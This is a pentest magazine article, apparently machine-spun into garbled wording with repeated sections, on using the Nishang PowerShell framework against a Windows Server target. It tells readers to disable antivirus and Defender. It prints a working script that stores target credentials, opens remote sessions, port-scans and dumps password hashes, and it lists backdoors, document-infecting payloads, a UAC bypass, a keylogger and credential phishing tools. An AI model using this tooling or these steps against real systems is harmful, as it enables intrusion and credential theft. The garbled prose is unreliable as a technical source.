This is my finally article on 2016. I promise to write a lot to a greater extent than inwards the adjacent year. It was originally published on PenTest Magazine. Check out the entire number at https://pentestmag.com/download/pentest-pawning-powershell/.
So, sit down back, relax in addition to savor a chip of pentesting amongst PowerShell. ;-)
Introduction
Nishang is a framework created past times the indian safety skillful Nikhil Mittal. It is a really interesting tool, since it unites a handful of scripts in addition to modules that tin last easily coupled amongst whatever PowerShell code. You tin utilisation it to execute diverse tasks, such equally network scanning in addition to enumeration, credentials discovery, WLAN passwords obtaining, remote execution in addition to many others. The Git repository tin last establish at https://github.com/samratashok/nishang.
For the sake of this article, I’ll focus on showing roughly of the possible uses of this framework. I have got 2 VMs on my lab environment. One of them is running Windows 10 amongst no updates. Let’s telephone yell upward it the attacker machine (or attacker, for short). The 2nd VM is running Windows Server 2012 R2 amongst the latest updates. Let’s telephone yell upward it the target machine (or target, for short).
It’s of import to sympathise that roughly antivirus programs tin translate Nishang’s code equally roughly form of malware. So, the full general advice inwards this illustration is: disable or fifty-fifty better, uninstall whatever antivirus y'all may have got on your assailant system. Mine has none.
Installation
That depends on you, but I remember the well-nigh mutual shape to create it would last to clone the repository. So, afterward installing Git for Windows (https://git-scm.com/download/win) on your assailant system, clone Nishang:
One of the get-go steps is to import nishang.psm1 equally a module into your system. Besides this file, there’s 1 to a greater extent than using the module format (Powerpreter.psm1). Powerpreter is the matrimony of all Nishang’s scripts inwards unmarried shell-like code. According Nikhil himself, it “wants to last Meterpreter afterward growing up”. :-) Anyway, whatever of Nishang's codes tin last used equally modules or private scripts. You solely have got to alter the file extension.
My assailant PowerShell version follows. As y'all may realize, I’m non using Windows 10 Anniversary Update.
First contact
Every screenshot hither was taken from the attacker. If y'all endeavor to start your piece of occupation amongst PowerPreter, y'all may larn a message similar this one:
This happens because Windows Defender is enabled past times default. This window basically agency your Powerpreter.psm1 volition last deleted in addition to you’ll have got to download it again. To avoid eventual errors such equally this one, y'all must disable this resource. Simply, run “gpedit.msc” in addition to locate Computer Configuration > Administrative Templates > Windows Components > Windows Defender. Double click “Turn off Windows Defender” in addition to pick out “Enabled”. Click Apply in addition to Ok. You’ll last done.
If y'all endeavor to import the nishang.psm1 equally a module using “Import-Module nishang.psm1”, y'all may larn an mistake message similar this:
This agency that execution policy of scripts is laid to “Restricted” on your system. This is the default setting. You must enable it to start playing amongst whatever PowerShell code. Open an administrative PowerShell session in addition to type:
This article doesn’t intend to explicate deep details of Nishang. Such are taken attention past times the official documentation. There are roughly URLs on the Internet suggesting to utilisation wce.exe to give the hashes. I prefer writing my code. It asks for the administrator (or roughly trouble organisation human relationship amongst administrative privileges) username (as long equally its password) for the target machine. Yeah, that’s necessary, since you’ll have got to post roughly payloads to it. I avoided dealing amongst exception treatment for the intention to have got a smaller terminal code.
The code is split upward inwards roughly functions to brand reading in addition to debugging easier. Some global variables are necessary since they must last changed within functions.
Global Variables
To avoid e'er scream for for username in addition to password, the “GetIPCredentials” business office reads this file in addition to obtains both variables for the target machine. In illustration you’re targeting roughly other system, you’ll have got to delete the Credentials.txt file in addition to the business office volition create it 1 time again amongst novel contents. Observe that the password is stored equally a hash.
When y'all import Nishang’s primary module into your code, y'all may larn roughly other mistake message stating that the module nesting boundary has been exceeded. This happens when your code resides inwards the Nishang’s primary folder or within 1 of its subfolders. That’s because nishang.psm1 searches all filenames finished amongst “.ps1” in addition to reads them to import the corresponding functions. Simply create your code inwards a separate folder.
I’m going to run remote Nishang code using Invoke-Command cmdlet. If you’re dealing amongst computers within in addition to exterior of an Active Directory domain, y'all may expression upward roughly issues regarding authentication in addition to the WinRM system. To circumvent them, y'all must insert the target IP address equally a trusted host. So, last aware of it earlier using Nishang. For instance, my assailant is non constituent of whatever domain, in addition to my target is a Domain Controller. In an administrative command prompt (regular or PowerShell), type:
Excerpt of “Get-Information”
Going farther amongst “Get-Information”:
The destination of “Get-Information”:
The “Get-PassHashes” is quite interesting too:
The terminal remarked code follows:
Nishang is really powerful in addition to has many utilities that tin last used to brand enumeration, uninstall updates, download in addition to run executables, bypass UAC, gauge Wireless LAN passwords in addition to many others tasks (check to a greater extent than at the Appendix).
The external documentation is a chip elementary in addition to it would last dainty if it gets improved. Some scripts didn’t run inwards my target organisation in addition to roughly other presented errors. Dealing amongst mistake manipulation would last much appreciated. The whole platform should last updated to fit modern operating systems similar the ones I used inwards this article. The code itself is good documented: every file starts amongst a small-scale header describing what that script does in addition to how it tin last used. It was written using the PowerShell aid format.
There are non thence many tools inwards PowerShell to acquit Pentesting. However, there’s no doubtfulness that Nishang is 1 of well-nigh consummate available packages. Combining its mightiness of beingness modularized amongst its mightiness to run code locally or remotely, y'all tin mix in addition to gibe many available scripts. You tin utilisation the code I introduce hither equally a starting betoken of something bigger through all possibilities that Nishang + PowerShell allow us.
Appendix
Below y'all tin notice the other scripts in addition to their purposes.
So, sit down back, relax in addition to savor a chip of pentesting amongst PowerShell. ;-)
Introduction
Nishang is a framework created past times the indian safety skillful Nikhil Mittal. It is a really interesting tool, since it unites a handful of scripts in addition to modules that tin last easily coupled amongst whatever PowerShell code. You tin utilisation it to execute diverse tasks, such equally network scanning in addition to enumeration, credentials discovery, WLAN passwords obtaining, remote execution in addition to many others. The Git repository tin last establish at https://github.com/samratashok/nishang.
For the sake of this article, I’ll focus on showing roughly of the possible uses of this framework. I have got 2 VMs on my lab environment. One of them is running Windows 10 amongst no updates. Let’s telephone yell upward it the attacker machine (or attacker, for short). The 2nd VM is running Windows Server 2012 R2 amongst the latest updates. Let’s telephone yell upward it the target machine (or target, for short).
It’s of import to sympathise that roughly antivirus programs tin translate Nishang’s code equally roughly form of malware. So, the full general advice inwards this illustration is: disable or fifty-fifty better, uninstall whatever antivirus y'all may have got on your assailant system. Mine has none.
Installation
That depends on you, but I remember the well-nigh mutual shape to create it would last to clone the repository. So, afterward installing Git for Windows (https://git-scm.com/download/win) on your assailant system, clone Nishang:
Powerpreter wants to last similar Meterpreter afterward growing up. :-)The scripts are organized into folders thence it gets tardily for y'all to utilisation them per your needs (check adjacent picture). Reading of README.md is recommended to sympathise basic usage of the code in addition to the names in addition to purpose of the scripts.
One of the get-go steps is to import nishang.psm1 equally a module into your system. Besides this file, there’s 1 to a greater extent than using the module format (Powerpreter.psm1). Powerpreter is the matrimony of all Nishang’s scripts inwards unmarried shell-like code. According Nikhil himself, it “wants to last Meterpreter afterward growing up”. :-) Anyway, whatever of Nishang's codes tin last used equally modules or private scripts. You solely have got to alter the file extension.
My assailant PowerShell version follows. As y'all may realize, I’m non using Windows 10 Anniversary Update.
First contact
Every screenshot hither was taken from the attacker. If y'all endeavor to start your piece of occupation amongst PowerPreter, y'all may larn a message similar this one:
This happens because Windows Defender is enabled past times default. This window basically agency your Powerpreter.psm1 volition last deleted in addition to you’ll have got to download it again. To avoid eventual errors such equally this one, y'all must disable this resource. Simply, run “gpedit.msc” in addition to locate Computer Configuration > Administrative Templates > Windows Components > Windows Defender. Double click “Turn off Windows Defender” in addition to pick out “Enabled”. Click Apply in addition to Ok. You’ll last done.
If y'all endeavor to import the nishang.psm1 equally a module using “Import-Module nishang.psm1”, y'all may larn an mistake message similar this:
This agency that execution policy of scripts is laid to “Restricted” on your system. This is the default setting. You must enable it to start playing amongst whatever PowerShell code. Open an administrative PowerShell session in addition to type:
PS C:\> Set-ExecutionPolicy Unrestricted
The PlaygroundThis article doesn’t intend to explicate deep details of Nishang. Such are taken attention past times the official documentation. There are roughly URLs on the Internet suggesting to utilisation wce.exe to give the hashes. I prefer writing my code. It asks for the administrator (or roughly trouble organisation human relationship amongst administrative privileges) username (as long equally its password) for the target machine. Yeah, that’s necessary, since you’ll have got to post roughly payloads to it. I avoided dealing amongst exception treatment for the intention to have got a smaller terminal code.
The code is split upward inwards roughly functions to brand reading in addition to debugging easier. Some global variables are necessary since they must last changed within functions.
Global Variables
$NishangFolder = "C:\Nishang\" $FileCred = $NishangFolder + "Credentials.txt" # Credentials File cite $CredProvided = $false # It's fake until target credentials are provided $Session = $null # Target PowerShell session $Target = $null # Target IP address
There’s a business office used to create a elementary carte in addition to afterward that, the primary functions. One of them is responsible to larn the target’s IP address in addition to credentials. It gets in addition to records username in addition to password inwards the $FileCred text file.To avoid e'er scream for for username in addition to password, the “GetIPCredentials” business office reads this file in addition to obtains both variables for the target machine. In illustration you’re targeting roughly other system, you’ll have got to delete the Credentials.txt file in addition to the business office volition create it 1 time again amongst novel contents. Observe that the password is stored equally a hash.
When y'all import Nishang’s primary module into your code, y'all may larn roughly other mistake message stating that the module nesting boundary has been exceeded. This happens when your code resides inwards the Nishang’s primary folder or within 1 of its subfolders. That’s because nishang.psm1 searches all filenames finished amongst “.ps1” in addition to reads them to import the corresponding functions. Simply create your code inwards a separate folder.
I’m going to run remote Nishang code using Invoke-Command cmdlet. If you’re dealing amongst computers within in addition to exterior of an Active Directory domain, y'all may expression upward roughly issues regarding authentication in addition to the WinRM system. To circumvent them, y'all must insert the target IP address equally a trusted host. So, last aware of it earlier using Nishang. For instance, my assailant is non constituent of whatever domain, in addition to my target is a Domain Controller. In an administrative command prompt (regular or PowerShell), type:
C:\>winrm set winrm/config/client @{TrustedHosts=”<IP address>”}
The next screenshots demonstrate roughly of the code output. Sensitive information is hidden.Excerpt of “Get-Information”
Going farther amongst “Get-Information”:
The destination of “Get-Information”:
The “Get-PassHashes” is quite interesting too:
The terminal remarked code follows:
<# .SYNOPSIS Influenza A virus subtype H5N1 elementary PowerShell code to test Nishang's scripts. .DESCRIPTION This script prompts for a target's credentials in addition to invokes roughly scripts. .AUTHOR Mauricio Harley (https://linkedin.com/in/mauricioharley) .DATE Nov 11th, 2016 #> <# Global Variables Section #> $NishangFolder = "C:\Nishang\" $FileCred = $NishangFolder + "Credentials.txt" # Credentials File cite $CredProvided = $false # It's fake until target credentials are provided $Session = $null # Target PowerShell session $Target = $null # Target IP address Import-Module C:\nishang\nishang.psm1 <# This business office is responsible to demonstrate the script's menu. #> Function ShowMenu { param ([string]$Header = 'Nishang Front-End') cls Write-Host "================ $Header ================" Write-Host "1: Inform Target IP in addition to Credentials." Write-Host "2: Do Target port scanning." Write-Host "3: Gather Target information." Write-Host "4: Get Target Password Hashes." Write-Host "5: Scan Unconstrained Delegation Enabled (it may have got a while)." Write-Host "Q: Press 'Q' to quit." } <# This business office collects target's IP addr, credentials in addition to opens a PS session. #> Function GetIPCredentials { # If the file already exists in addition to is non zero, nosotros only demand to read it If ((Test-Path $FileCred) -and ((Get-Item $FileCred).Length -gt 0)) { $Username = (Get-Content $FileCred)[0] $Password = (Get-Content $FileCred)[1] } Else { Write-Host "Enter the target’s username (including domain if necessary): " -NoNewline $Username = Read-Host Write-Host "Enter the corresponding password: " -NoNewline $Password = Read-Host -AsSecureString | ConvertFrom-SecureString Echo $Username > $FileCred Echo $Password >> $FileCred } # For the password, nosotros demand to convert it dorsum to a readable format. $Password = (Get-Content $FileCred)[1] | ConvertTo-SecureString # Storing credentials within a unmarried variable $Credentials = New-Object -TypeName System.Management.Automation.PSCredential ` -ArgumentList $Username, $Password Write-Host Write-Host "Enter target's IP address: " -NoNewline $global:Target = Read-Host # Opening remote PowerShell session amongst the target $global:Session = New-PSSession -ComputerName $global:Target -Credential $Credentials $global:CredProvided = $true $Temp = $NishangFolder + "nishang.psm1" Invoke-Command -Session $global:Session -ScriptBlock { Import-Module $using:Temp } } <# This business office is genuinely responsible for running something locally or at the target. #> Function DoSomething { param ([string]$Param) # Param: Chosen selection if (-not $global:CredProvided) { Write-Host "You must render credentials first!" Return } else { if ($Param -eq '2') { # If the selection is '2', the command runs locally (unique case). Invoke-PortScan -StartAddress $global:Target -EndAddress $global:Target } elseif ($Param -eq '3') { # Any other selection volition require remote command execution. Invoke-Command -Session $global:Session -ScriptBlock { Get-Information } } elseif ($Param -eq '4') { # Any other selection volition require remote command execution. Invoke-Command -Session $global:Session -ScriptBlock { Get-PassHashes } } elseif ($Param -eq '5') { # Any other selection volition require remote command execution. Invoke-Command -Session $global:Session -ScriptBlock { Get-Unconstrained } } } } Do { cls ShowMenu $Option = Read-Host "Please pick out an option: " $Option = $Option.ToUpper() Switch ($Option) { '1' { GetIPCredentials } '2' { DoSomething $Option } '3' { DoSomething $Option } '4' { DoSomething $Option } '5' { DoSomething $Option } 'Q' { Write-Host "Bye!" } default { Write-Host "Invalid option!" } } Pause } Until ($Option -eq 'Q') # Closing the remote session if ($Session -ne $null) { Remove-PSSession -Session $Session }
ConclusionNishang is really powerful in addition to has many utilities that tin last used to brand enumeration, uninstall updates, download in addition to run executables, bypass UAC, gauge Wireless LAN passwords in addition to many others tasks (check to a greater extent than at the Appendix).
The external documentation is a chip elementary in addition to it would last dainty if it gets improved. Some scripts didn’t run inwards my target organisation in addition to roughly other presented errors. Dealing amongst mistake manipulation would last much appreciated. The whole platform should last updated to fit modern operating systems similar the ones I used inwards this article. The code itself is good documented: every file starts amongst a small-scale header describing what that script does in addition to how it tin last used. It was written using the PowerShell aid format.
There are non thence many tools inwards PowerShell to acquit Pentesting. However, there’s no doubtfulness that Nishang is 1 of well-nigh consummate available packages. Combining its mightiness of beingness modularized amongst its mightiness to run code locally or remotely, y'all tin mix in addition to gibe many available scripts. You tin utilisation the code I introduce hither equally a starting betoken of something bigger through all possibilities that Nishang + PowerShell allow us.
Appendix
Below y'all tin notice the other scripts in addition to their purposes.
- Antak: Executes PowerShell scripts inwards memory, run commands, downloads in addition to uploads files using this webshell;
- HTTP-Backdoor: Influenza A virus subtype H5N1 backdoor which tin have instructions from 3rd political party websites in addition to execute PowerShell scripts inwards memory;
- DNS_TXT_Pwnage: Influenza A virus subtype H5N1 backdoor which tin have commands in addition to PowerShell scripts from DNS TXT queries, execute them on a target in addition to last remotely controlled using the queries;
- Execute-OnTime: Influenza A virus subtype H5N1 backdoor which tin execute PowerShell scripts at a given fourth dimension on a target;
- Gupt-Backdoor: Influenza A virus subtype H5N1 backdoor which tin have commands in addition to scripts from a WLAN SSID without connecting to it;
- Add-ScrnSaveBackdoor: Influenza A virus subtype H5N1 backdoor which tin utilisation Windows hide saver for remote command in addition to script execution;
- Invoke-ADSBackdoor: Influenza A virus subtype H5N1 backdoor which tin utilisation alternate information streams in addition to Windows Registry to arrive at persistence;
- Out-CHM: Create infected CHM files which tin execute PowerShell commands in addition to scripts;
- Out-Word: Create Word files in addition to infect existing ones to run PowerShell commands in addition to scripts;
- Out-Excel: Create Excel files in addition to infect existing ones to run PowerShell commands in addition to scripts;
- Out-HTA: Create a HTA file which tin last deployed on a spider web server in addition to used inwards phishing campaigns;
- Out-Java: Create signed JAR files which tin last used amongst applets for script in addition to command execution;
- Out-Shortcut: Create shortcut files capable of executing PowerShell commands in addition to scripts;
- Out-WebQuery: Create IQY files for phishing credentials in addition to SMB hashes;
- Out-JS: Create JS files capable of executing PowerShell commands in addition to scripts;
- Out-SCT: Create SCT files capable of executing PowerShell commands in addition to scripts;
- Out-SCF: Create a SCF file which tin last used for capturing NTLM hash challenges;
- Enable-DuplicateToken: When SYSTEM privileges are required;
- Remove-Update: Introduce vulnerabilities past times removing patches;
- Invoke-PsUACme: Bypass UAC;
- Download-Execute-PS: Download in addition to execute a PowerShell script inwards memory;
- Download_Execute: Download an executable inwards text format, convert it to an executable, in addition to execute;
- Execute-Command-MSSQL: Run PowerShell commands, native commands, or SQL commands on a MSSQL Server amongst sufficient privileges;
- Execute-DNSTXT-Code: Execute shellcode inwards retentiveness using DNS TXT queries;
- Out-RundllCommand: Execute PowerShell commands in addition to scripts or a contrary PowerShell session using rundll32.exe;
- Check-VM: Check for a virtual machine;
- Copy-VSS: Copy the SAM file using Volume Shadow Copy Service;
- Invoke-CredentialsPhish: Trick a user into giving credentials inwards plainly text;
- FireBuster/FireListener: Influenza A virus subtype H5N1 pair of scripts for egress testing Get-LSASecret Get LSA Secret from a target;
- Get-WLAN-Keys: Get WLAN keys inwards plainly text from a target;
- Keylogger: Log keystrokes from a target;
- Invoke-MimikatzWdigestDowngrade: Dump user passwords inwards plainly on Windows 8.1 in addition to Server 2012.